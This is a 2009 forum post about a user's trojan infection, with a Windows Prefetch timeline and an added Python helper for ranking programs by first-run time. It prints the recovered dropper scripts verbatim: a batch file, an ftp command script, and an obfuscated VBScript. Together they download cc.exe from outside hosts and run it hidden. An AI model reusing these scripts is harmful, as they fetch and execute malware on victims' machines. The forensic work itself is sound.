电脑鱼我 2009-05-14 15:28:46
xdowns "green" download site: the prime suspect
Got hit by a trojan today. The suspects are the few files I downloaded this morning, and the biggest suspect is the Total Commander 7.5 beta1 "greenified" (portable) build downloaded from xdowns.com.
But I scanned it with NOD32 before running it and it found nothing. Maybe it was something I downloaded earlier? Or it was packed to evade AV? Or it spread over the LAN?
What happened:
First 360 popped up saying a dangerous process was being added to the startup items, called soundman.exe (nice choice of name).
Looking at the network connections, a new x0xx.exe had connected to a dozen or so IPs.
That got my attention, so I first ran the malicious-plugin scanner, which found two: the ftppopo trojan and the soundman adware,
but they could only be removed after a reboot, so I rebooted. 360 is clearly far too weak; it couldn't clean things up.
This time NOD32 raised the alarm, even though I was clearly not online, saying an infected image from some web page had been found. I cleaned up the several exe files NOD32 turned up.
Then I searched the C: drive for files created that day and found three unfamiliar ones: bai.bat, bai.vbs and help.dll.
Their contents look fairly simple: use ftp to download cc.exe and cc1.exe from the home page, then run them.
bai.bat:
del cc.exe
ftp.exe -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sfd -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sft -s:C:\WINDOWS\help\help.dll
cc.exe
cc.exe
cc1.exe
cc1.exe
if not exist cc.exe C:\WINDOWS\help\bai.VBS
:end
del C:\WINDOWS\help\help.dll
del C:\WINDOWS\help\bai.BAT
exit
bai.vbs:
on error resume next
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"www.fgetchr.cn:83/rc/zj/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "cc"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.RUN "cc"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide
oshell.RUN "cmd.exe /c del C:\WINDOWS\help\bai.VBS",vbhide
help.dll:
OPEN crr.fdu8.cn
168
get crr.ini cc.exe
get crt.ini cc1.exe
bye
Whatever walks leaves tracks. While searching the C: drive for files modified that day I found a lot of .pf files.
A quick Google showed they are XP prefetch files: whenever any .exe program runs, a prefetch file named program name + string + .pf extension is left in c:\windows\prefetch, and that file's creation time is the time the program was first run.
Time   Prefetch file                  Note
08:17  CTERM.EXE-0092328C.pf          cterm
08:18  PLINK.EXE-39A950BB.pf          cterm
08:18  CONIME.EXE-13EEEA1A.pf
08:19  NOTEPAD.EXE-189578DA.pf        notepad
08:23  I_VIEW32.EXE-00524BD4.pf       irfanview
08:38  WINRAR.EXE-39C6DAD9.pf         unpacking; was it Total Commander that got unpacked? ?
08:43  REGSVR32.EXE-25EEFE2F.pf       registered what? ?
08:44  NOTEPAD.EXE-336351A9.pf        notepad
08:57  白云草地.SCR-378720D2.pf       default screensaver, 10 minutes idle
08:57  PING.EXE-31216D26.pf           something's wrong: who ran ping, and pinged whom? ?
09:02  Layout.ini
09:09  CMD.EXE-087B4001.pf            DOS run; the virus downloading? via ftp? ?
09:09  GRASPNET.EXE-0B918C46.pf       Guanjiapo network edition
09:10  GRASPSVR.EXE-2DEFD5FB.pf       Guanjiapo server
09:11  HH.EXE-2D1A70B3.pf             chm reader
09:11  XOXXO.EXE-0B434BD4.pf          infection triggered !
09:11  SCKTSRVR.EXE-016C0AD5.pf       Guanjiapo socket
09:14  360REALPRO.EXE-362BB6E8.pf
09:16  FGKEY.EXE-0AA7CFBC.pf          !
09:18  AUTOCHK.EXE-2F8C59C3.pf        !
09:18  SMSS.EXE-22F38377.pf
09:18  CSRSS.EXE-12B63473.pf
09:18  WINLOGON.EXE-32C57D49.pf
09:18  SERVICES.EXE-2F433351.pf
09:18  LSASS.EXE-20DB6D1B.pf
09:18  LOGONUI.EXE-0AF22957.pf        !
09:18  SPOOLSV.EXE-282F76A7.pf
09:18  EXPLORER.EXE-082F38A9.pf
09:18  USERINIT.EXE-30B18140.pf
09:18  EKRN.EXE-1C5A1FAB.pf           nod32
09:18  MOZYBACKUP.EXE-0BF614CF.pf
09:18  LSESVC.EXE-12E9827A.pf
09:18  GOOGLEUPDATE.EXE-1E123D86.pf   google auto-update
09:18  UPCLT.EXE-00E321FD.pf          !
09:18  RUNDLL32.EXE-1557771B.pf
09:18  SQLSERVR.EXE-0E1BC080.pf
09:18  NVSVC32.EXE-1F9EED18.pf
09:18  SPNSRVNT.EXE-2F7B0B31.pf
09:18  SMLOGSVC.EXE-054B1E6C.pf
09:18  WDFMGR.EXE-2CF4013B.pf
09:19  EGUI.EXE-1E959554.pf           nod32
09:19  ALG.EXE-0F138680.pf
09:19  360TRAY.EXE-01032BE2.pf        360
09:19  EGUI.EXE-04F201EB.pf           nod32
09:19  CTFMON.EXE-0E17969B.pf
09:19  ATNOTES.EXE-0DD737CD.pf
09:19  SQLMANGR.EXE-0150BA62.pf
09:20  360SAFE.EXE-272F6EFC.pf
09:21  UNINSTALL.EXE-2FBB2708.pf
09:21  AU_.EXE-3050D4ED.pf            !
09:22  SVCHOST.EXE-3530F672.pf
09:23  MMC.EXE-22FA564C.pf
09:24  WMIPRVSE.EXE-28F301A9.pf
09:29  OPERA.EXE-294893A7.pf
09:44  RUNDLL32.EXE-12E27DD0.pf
XOXXO.EXE-0B434BD4.pf was created at 09:11,
which means xoxxo.exe ran at 09:11.
The closest to it is hh.exe, which is the prime suspect, with GRASP next,
but given the inexplicable REGSVR32, ping and cmd earlier, and xdowns' consistently poor reputation, there is good reason to suspect it was the extracted Total Commander that carried the virus.
It is quiet for now; let's see whether it comes back tomorrow.
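The timeline reasoning above (read the creation time of each .pf file in the Prefetch folder as that program's first run, then look at what ran just before the malicious process) can be made mechanical. The Python below is an added example written for this page, not code from the post or from any tool the author used. It uses the real XP Prefetch naming convention (EXE name, a dash, eight hex digits of a path hash, .pf) and a sample listing constructed from the rows of the post's table around 09:11; the function names are my own. Two practitioner caveats are built into it: non-.pf files such as Layout.ini also live in the Prefetch folder and must be skipped, and the nearest-in-time neighbour is only a lead, since several programs can share the same minute, which is exactly why the post hedges between hh.exe and GRASP.

```python
import re
from datetime import datetime, timedelta

# XP-era Prefetch file name: <EXE NAME>-<8 hex digits of a path hash>.pf
PF_NAME = re.compile(r"^(?P<exe>.+)-(?P<hash>[0-9A-Fa-f]{8})\.pf$")

# Constructed sample: the rows of the post's table around the 09:11 event
# (HH:MM on 2009-05-14, the post's date). Layout.ini is a non-.pf file that
# also lives in the Prefetch folder and must be skipped.
SAMPLE_PREFETCH = [
    ("08:38", "WINRAR.EXE-39C6DAD9.pf"),
    ("08:43", "REGSVR32.EXE-25EEFE2F.pf"),
    ("08:57", "PING.EXE-31216D26.pf"),
    ("09:02", "Layout.ini"),
    ("09:09", "CMD.EXE-087B4001.pf"),
    ("09:09", "GRASPNET.EXE-0B918C46.pf"),
    ("09:10", "GRASPSVR.EXE-2DEFD5FB.pf"),
    ("09:11", "HH.EXE-2D1A70B3.pf"),
    ("09:11", "XOXXO.EXE-0B434BD4.pf"),
    ("09:11", "SCKTSRVR.EXE-016C0AD5.pf"),
    ("09:16", "FGKEY.EXE-0AA7CFBC.pf"),
]
DAY = datetime(2009, 5, 14)


def parse_prefetch_name(name):
    """'XOXXO.EXE-0B434BD4.pf' -> ('XOXXO.EXE', '0B434BD4'); None for non-.pf names."""
    m = PF_NAME.match(name)
    if m is None:
        return None
    return m.group("exe").upper(), m.group("hash").upper()


def sample_entries():
    """Turn the constructed rows into (creation_time, file_name) pairs, the shape
    a directory listing of C:\\WINDOWS\\Prefetch with creation times would give."""
    out = []
    for hm, name in SAMPLE_PREFETCH:
        hour, minute = (int(x) for x in hm.split(":"))
        out.append((DAY + timedelta(hours=hour, minutes=minute), name))
    return out


def build_timeline(entries):
    """Sorted list of (first_run_time, exe, hash) from (creation_time, file_name) pairs.
    On XP the .pf creation time is the program's first run, which is what the post relies on."""
    timeline = []
    for created, name in entries:
        parsed = parse_prefetch_name(name)
        if parsed is None:
            continue  # Layout.ini and similar non-prefetch files
        exe, path_hash = parsed
        timeline.append((created, exe, path_hash))
    timeline.sort(key=lambda row: row[0])  # stable sort: ties keep listing order
    return timeline


def ran_before(timeline, target_exe, window_minutes):
    """Programs whose first run falls within window_minutes before (or in the same
    minute as) target_exe's first run, nearest in time first. This is the post's
    "what ran closest to xoxxo.exe" question made mechanical."""
    target = target_exe.upper()
    target_times = [t for t, exe, _ in timeline if exe == target]
    if not target_times:
        return []
    t0 = min(target_times)
    lo = t0 - timedelta(minutes=window_minutes)
    hits = [(t0 - t, exe) for t, exe, _ in timeline if exe != target and lo <= t <= t0]
    hits.sort(key=lambda h: h[0])
    return [exe for _, exe in hits]


def unknown_programs(timeline, known_exes):
    """Executables in the timeline that are not on a known-good list: the post's '!' marks."""
    known = {k.upper() for k in known_exes}
    return sorted({exe for _, exe, _ in timeline if exe not in known})


if __name__ == "__main__":
    tl = build_timeline(sample_entries())
    print("ran within 5 min before XOXXO.EXE:", ran_before(tl, "xoxxo.exe", 5))
    baseline = ["cmd.exe", "ping.exe", "regsvr32.exe", "winrar.exe", "hh.exe"]
    print("not on baseline:", unknown_programs(tl, baseline))
```

On the sample, a 5-minute window returns HH.EXE and SCKTSRVR.EXE (same minute as the malicious process), then GRASPSVR.EXE, CMD.EXE and GRASPNET.EXE; widening it to an hour pulls in PING.EXE, REGSVR32.EXE and WINRAR.EXE, the three the post flags as suspicious earlier in the morning. Creation time only gives the first run; if the program was run again, that is not visible from the file name and timestamp alone.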